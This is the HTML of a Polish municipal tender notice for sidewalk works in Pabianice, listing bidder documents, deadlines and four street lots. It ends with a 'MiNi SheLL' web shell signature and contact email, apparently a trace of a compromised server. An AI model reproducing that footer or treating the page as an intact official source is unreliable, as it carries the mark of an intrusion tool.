<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenie Wykonawcy o sposobie realizacji zamówienia, w tym o powierzeniu do wykonania części zamówienia podwykonawcy z podaniem zakresu powierzonych prac (wzór w SIWZ),
b) formularz cenowy (wzór w SIWZ).
c) formularz oferty (wzór w SIWZ).
d) kosztorysy ofertowe sporządzone z wykorzystaniem tych samych co przedstawione przez Zamawiającego w przedmiarach robót (kosztorysach nakładczych) pozycji, z wyszczególnieniem wskaźników cenotwórczych w oparciu o które został sporządzony każdy z kosztorysów ofertowych. Każdy kosztorys ofertowy w wersji uproszczonej lub szczegółowej, winny zawierać stawki i narzuty przyjęte do kosztorysowania oraz wszelkie zestawienia R, M, S.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.pabianice.pl/index.php?idmp=701&r=o<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pabianice, ul. Warzywna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2014 godzina 11:00, miejsce: Pabianice, ul. Warzywna 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) ulica PIOTRA SKARGI (odcinek: ulica Nawrockiego - ulica Dobra, strona południowa) o długości ok. 351 m i powierzchni łącznie z wjazdami 802 m2, 
2) ulica DOLNA (odcinek: ulica Myśliwska - parking, strona południowa) o długości ok. 64 m i powierzchni 131 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ulica ŁASKA (odcinek: od ulicy Tkackiej w stronę zachodnią, strona południowa) o długości ok. 110 m i powierzchni 851 m2
b) ulica ŚNIADECKIEGO (odcinek: ulica Wileńska - ulica Moniuszki, strona wschodnia) o długości ok. 197 m i powierzchni łącznie z wjazdami 714 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ulica TOROWA (odcinek: przejazd kolejowy - ulica Karniszewicka, strona zachodnia) o długości ok. 198 m i powierzchni łącznie z wjazdami 549 m2
b) ulica TOROWA (odcinek: ulica Wspólna - wjazd do GS, strona zachodnia) o długości 459 m i powierzchni łącznie z wjazdami 886 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ulica MOKRA (odcinek: ulica Smugowa - droga wewnętrzna PSM, strona południowa) o długości 192 m i powierzchni łącznie z wjazdami 393 m2
b) ulica ZAMKOWA (odcinek: ulica Wyspiańskiego - ulica Wyszyńskiego, strona południowa) o długości 195 m i powierzchni 607 m2
c) ulica GROTA ROWECKIEGO (okolice wjazdu do SP nr 3, strona południowa) o długości 110 m i powierzchni 348 m2
d) ulica OSSOWSKIEGO (okolice bloku nr 47/49, strona południowa) o długości 122 m i powierzchni 805 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com